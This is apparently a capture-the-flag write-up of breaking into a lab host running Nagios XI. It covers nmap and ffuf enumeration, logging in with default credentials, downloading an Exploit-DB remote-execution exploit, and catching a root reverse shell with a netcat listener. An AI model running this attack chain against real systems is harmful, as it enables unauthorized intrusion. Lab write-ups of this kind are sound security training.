I scanned the target to discover open ports:

  • nmap -p- -sC -A -T4 <TARGET-IP>

Result:

  • There were 5 open ports on the target system (ssh, smtp, http, and smb)

Step 2: Enumeration

I began enumeration of port 80 by running a ffuf scan to discover web directories:

  • ffuf -u http://<TARGET-IP>/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt -mc 200,301,302,403 -e .php,.bak,.txt,.js,.json,.xml

Result:

  • 1 directory was found: javascript

The next thing I did was visit the target in the Firefox browser:

  • http://<TARGET-IP>

Result:

  • There was a Nagios CMS web application being hosted, as the nmap results had told us, that required credentials

There weren't any credentials within the SMB shares, so I searched up the default credentials for Nagios via OSINT, as this was my first time seeing this CMS.

Result:

  • There were login credentials for Nagios

The credentials found publicly didn't work, but they were a starting point. I had to be smart because the password wasn't correct, but I eventually was able to log in:

  • username:nagiosadmin, password:admin

Step 3: Enumeration

I scrutinized everything within the Nagios portal, but there wasn't anything such as a place to upload files or execute code so that I could get a reverse shell, so I searched Exploit-DB for existing exploits:

  • searchsploit nagios 5.6

Result:

  • There was an Authenticated Remote Execution exploit for Nagios

I copied the exploit to my machine, and then checked the exploit's usage and looked at other configurations:

  • searchsploit -m multiple/webapps/52138.txt (download the script)
  • cat 52138.txt (display the contents of the script)

Before I ran the exploit, I set up a listener in preparation to catch the connection and get a shell:

  • rlwrap nc -lvnp 443

After setting up the listener I ran the script:

  • python3 exp.py -t http://<TARGET-IP> -b /nagiosxi -u nagiosadmin -p 'admin' -lh <ATTACKER-IP> -lp <LISTENER-PORT>

Result:

  • The exploit successfully worked and I was able to catch the connection on my listener, resulting in a shell

Step 4: Post Exploitation

Lastly, as the exploit gives me a shell as the root user, all I did was list all the files and retrieve the root flag:

  • ls -la
  • cat proof.txt

Thanks for reading this writeup, hopefully it helped you out. Stay tuned for many more writeups.